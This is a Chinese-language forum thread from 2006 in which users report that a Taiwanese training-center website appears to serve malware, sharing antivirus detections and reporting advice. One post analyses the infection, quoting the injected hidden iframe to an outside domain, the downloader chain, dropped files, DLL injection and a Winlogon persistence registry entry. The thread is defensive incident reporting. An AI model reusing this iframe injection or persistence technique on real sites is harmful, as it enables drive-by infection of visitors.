會員 | 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式? 昨天同事告知...最後她做了一條有關media player的註冊機碼刪除 結果導致她登入XP後馬上又登出(安全模式也一樣).. 我自己的AntiVir 7測試結果http://www.iiiedu.org.tw(進首頁就有,其他部份頁面也有) 的確也是有問題的.. clamav,trend也有欄到病毒但沒全發現,因為我認為該網址其中iframe連結到www.fxkfxk.com的網站中似乎不只一種惡意程式... 請大家看看手法是不是跟手機王一樣...請資策會處理似乎沒人理...還是我多心 這些程式都誤判了 ..(應該不至於吧...) 總之...org.tw內隱含大陸網站的連結...我覺得很不正常吶... |
回覆 |
會員 | 回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式? |
回覆 |
會員 | 回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式? 引用:
Win32/TrojanDownloader.Delf.NJH trojan ... 最近攻擊真多... | |
回覆 |
地平線的那端 | 回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式? AVG Anti-Virus FreeEdition 偵測到 "Win32/PEPatch"病毒,會自動從 www.iiiedu.org.tw 網站下載 PDLL.dll 到 C:\Windows\System\資料夾內,請大家用自己的防毒軟體偵測一下吧~ |
回覆 |
會員 | 回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式? 另一個小小心得分享 基本上我這邊連上.....iiied.org.tw總共會經過3道防毒程式的"處理" 已更新至今日的病毒碼 1.clamav (proxy) 2.trend (proxy) 3.AntiVir 7 Free版(本機) 但1,2無法在 proxy把病毒全排除,最後還好本機防毒夠力... 再搭配同事使用symantec 10的經驗...看來我明年得評估AntiVir的 企業解決方案了... |
回覆 |
會員 | 回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式? 請問卡巴斯基能抓到嗎?麻煩各位大大把病毒樣本傳送給卡巴斯基吧 |
回覆 |
會員 | 回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式? 請有偵測到病毒的人向刑事警察局檢舉吧 http://www.cib.gov.tw/mail/Mail_Report.aspx |
回覆 |
會員 | 回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式? 引用:
| |
回覆 |
會員 | 回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式? 以下是這隻木馬的行為: 1. 首頁被植入 <iframe src="hxxp://www.fxkfxk.com/333/us.asp" width="0" height="0" scrolling="no" frameborder="0"></iframe> 2. 檔案 us.asp 是一個 VBScript,它會下載或執行 us.exe。 3. 執行之後,系統會產生: [Added process] C:\WINDOWS\svchost.exe [DLL Injection] C:\WINDOWS\svchost.exe 注入某些執行程序,例如, svchost.exe 等等。 C:\WINDOWS\system32\PDLL.dll 注入某些執行程序,例如, svchost.exe、explorer.exe 等等。 C:\WINDOWS\winnt.dll 注入某些執行程序,例如, 瀏覽器等等。 C:\WINDOWS\winntKey.DLL 注入某些執行程序,例如, svchost.exe 等等。 [Added service] NAME=PigeonServer DISPLAY=PigeonServer FILE=C:\WINDOWS\winnt.exe [Drop Files] C:\Program Files\WindowsUpdate\1.exe C:\Program Files\WindowsUpdate\2.exe C:\WINDOWS\svchost.exe C:\WINDOWS\system32\PDLL.dll C:\WINDOWS\winnt.dll C:\WINDOWS\winnt.exe C:\WINDOWS\winntKey.DLL [Added Registries] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon||Value=Userinit||Data=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\svchost.exe, 此篇文章於 2006-11-01 04:08 PM 被 sai7sai 編輯。. |
回覆 |
會員 | 回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式? Hello, us.exe - Trojan-Downloader.Win32.Delf.em - new malicious software was found in this file. It's detection will be included in the next update. Thank you for your help. -- Best regards, Leonid Khovansky Virus analyst, Kaspersky Lab. e-mail: [email protected] http://www.kaspersky.com/ |
回覆 |
主題工具 | |
|
類似的主題 | ||||
主題 | 主題作者 | 討論版 | 回覆 | 最後發表 |
【討論】 有關OSSBOX硬體討論 | rushoun | -- 電 腦 硬 體 討 論 版 | 16 | 2010-02-12 03:46 AM |
【討論】 so-net與seednet比較? | vicky0102 | ---- ADSL 方 案 與 費 率 | 5 | 2008-04-10 11:56 PM |
【討論】 可否推薦探討幾款無線寬頻分享器 | rdbutton | -- 無 線 網 路 版 | 0 | 2008-03-14 01:25 PM |
【討論】 台北大同區adsl想轉cm | sadspat | -- Cable Modem 心 得 交 流 版 | 4 | 2007-07-31 04:11 PM |
【討論】 檔案伺服器的規劃 | abc111 | ☉ -- 架 站 DIY 討 論 版 | 1 | 2006-08-14 08:01 AM |
XML | RSS 2.0 | RSS |
本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。